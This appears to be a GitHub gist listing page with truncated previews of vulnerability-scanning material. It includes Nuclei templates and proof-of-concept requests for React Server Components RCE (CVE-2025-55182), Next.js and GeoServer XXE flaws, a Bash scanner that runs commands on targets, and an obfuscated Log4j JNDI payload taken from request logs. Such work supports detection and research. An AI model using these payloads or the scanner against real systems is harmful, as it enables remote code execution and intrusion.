Skip to content

Instantly share code, notes, and snippets.

View emadshanab's full-sized avatar
🏠
Working from home

Emad Shanab emadshanab

🏠
Working from home
711 followers · 274 following
View GitHub Profile
@Pymmdrza
Pymmdrza / Backup_finder_nuclei_v2.yml
Last active January 24, 2026 19:01
Nuclei Backup Finder Templete
id: file-type-search-all
info:
name: File Type Search
author: ProjectDiscoveryAI
severity: low
description: |
Searches for files with specific extensions (.tar, .gz, .tar.gz, .zip, .sql, .bak, .rar) on the target, regardless of the file name.
tags: file,fuzzing
@themadarchitect
themadarchitect / react2shell.yaml
Created December 14, 2025 19:32
nuclei react2shell template
id: cve-2025-55182-cve-2025-66478-react-nextjs-rce
info:
name: React Server Components and Next.js RSC Flight Protocol - Remote Code Execution
author: unknown
severity: critical
description: |
Detects CVE-2025-55182 and CVE-2025-66478 vulnerabilities allowing unauthenticated
Remote Code Execution (RCE) in React Server Components and Next.js through insecure
deserialization in the RSC Flight protocol.
@bolhasec
bolhasec / CVE-2025-55183.yaml
Created December 12, 2025 21:55
POC for CVE-2025-55183
id: CVE-2025-55183
# In my tests, using -debug flag provides better results
info:
name: Next.js Server Action Introspection
author: sushicomabacate
severity: high
description: |
Extracts 40 or 42-character Server Action IDs from /_next/static/chunks/app/page.js and invokes them via POST to check for source code leakage.
@simokohonen
simokohonen / gist:c7b21f3d47e2e45613fec36f535547a1
Created December 12, 2025 07:08
cisco_log4j_looking_things
GET /${${1:-j}${fg:7:-n}${0:an:3d7:-d}${8l:-i}${36jv:co9p:-:}${a4:5p2:-l}${7c2r:hrw:-d}${5l6x:-a}${i:-p}${ml:7:fodr:-:}${93:-/}${sbt3:xl:-/}${vsfp:-P}${c:dr76:-A}${x8:mnft:8nt6:-l}${pntj:nt9:-0}${k6:-c}${rv:pbuh:--}${${qdcr:5e:f:-s}${rj9:-y}${vag6:np1:m1:-s}${bop:-:}${ku5x:-j}${y3:-a}${j:-v}${h7j8:-a}${3hg:5a:y4s:-.}${f:fij:6:-v}${ql:-e}${i0ew:kfju:vyfb:-r}${0q:1:hdql:-s}${zg:o8a:-i}${jrp:ht0:-o}${jo9:-n}}${d:-.}${r:7:-8}${34tz:zbp:-b}${v7g:-3}${g6x:-6}${umdk:-1}${6zgi:-6}${gek:-d}${4p0:eq7z:yv1:-3}${4v:m9l:s3:-5}${e:-e}${3g0u:8:cbo:-1}${sxv:03hs:mh:-9}${7klx:2u:-f}${x:pb:-d}${1e:i2gk:y:-8}${9cpw:n0ap:-2}${qm:3i:-d}${9i:nu1:-f}${kwh:07p:89j:-0}${h8z:a:-f}${o:v0jg:o3v:-4}${be8z:q3v:bt:-0}${4:q14:-6}${n:o:-0}${c:ucfk:o06p:-1}${6:-2}${n4:-2}${w0u:-f}${oc4h:n:g42:-5}${nciz:2kb:rz1l:-7}${0wl:ux8:-c}${z1:-8}${16s:on:8s:-3}${d:hzb:-3}${a:-8}${ki:qk1:-f}${pnk:d:-d}${ovai:-9}${d:-0}${orxs:j:-e}${cw:a:-2}${q:ml:-a}${im:towb:6c:-.}${h:794c:-d}${92op:7rz:-n}${189j:-s}${85t:p4k:--}${6:ph:-e}${s5:-x}${r9iy:-f}${w:i:iufr:-i
@spynika
spynika / r2shell.yaml
Created December 9, 2025 06:03
id: CVE-2025-55182
info:
  name: React Server Components - Remote Code Execution (React2Shell)
  author: assetnote,slcyber
  severity: critical
  description: |
    React Server Components (RSC) in React versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 contain an insecure deserialization
    vulnerability in the Flight protocol. An unauthenticated remote attacker can exploit this by sending a specially crafted
    multipart payload to execute arbitrary JavaScript code on the server. This affects Next.js applications using the App
@Ademking
Ademking / scanner.sh
Created December 8, 2025 14:44
CVE-2025-55182 Scanner - React2Shell
#!/bin/bash
# CVE-2025-55182 Advanced Scanner
# A comprehensive tool for detecting and exploiting CVE-2025-55182 in Next.js applications
# Based on the Nuclei template from: https://cloud.projectdiscovery.io/library/CVE-2025-55182
#
# Usage:
# ./scanner.sh -d <domain> -c <command>
# ./scanner.sh -d vulnapp.com -c id
# ./scanner.sh -d http://localhost:3000 -c "ping -c 3 google.com"
@bolhasec
bolhasec / CVE-2025-55182.yaml
Created December 4, 2025 21:36
Nuclei template for CVE-2025-55182
# Run with
# nuclei -u http://localhost:3000/ -id react-rsc-rce-oast -iserver <your own interactsh URL>
# For example: nuclei -u http://localhost:3000/ -id react-rsc-rce-oast -iserver mrh2hxtll3x5n6blhhjq304t0k6b21iy.oastify.com
id: react-rsc-rce-oast
info:
name: React RSC / Next.js RCE via Prototype Pollution (OAST)
author: sushicomabacate
severity: critical
description: |
@maple3142
maple3142 / CVE-2025-55182.http
Last active January 25, 2026 06:20
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@MQ-xz
MQ-xz / reNgine full scan engine.yml
Last active January 24, 2026 19:07
reNgine Full scan engine (subdomains + passive & active)
reNgine full scan engine (subdomains + passive & active)
# YOYO model: passive discovery -> active enumeration/validation -> passive re-check/cleanup
# This engine performs subdomain enumeration, URL fetching, passive scans first,
# then active follow-ups (port scan, aggressive dir fuzzing, active vuln templates),
# then a final passive validation pass to reduce false positives and re-collect endpoints.
# Drop this file in web/config/default_scan_engines/ and load with the update scripts/management commands.
custom_header: {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0',
}
@bolhasec
bolhasec / poc-CVE-2025-58360.yaml
Created November 26, 2025 11:23
POC for CVE-2025-58360
id: geoserver-wms-sld-xxe
info:
name: GeoServer WMS SLD XXE Detection
author: bolhasec
severity: medium
description: |
Attempts to exploit an XXE vulnerability via a StyledLayerDescriptor (SLD)
in a WMS GetMap POST request. A secure GeoServer instance should reject
entity resolution and return an error like "Entity resolution disallowed for file".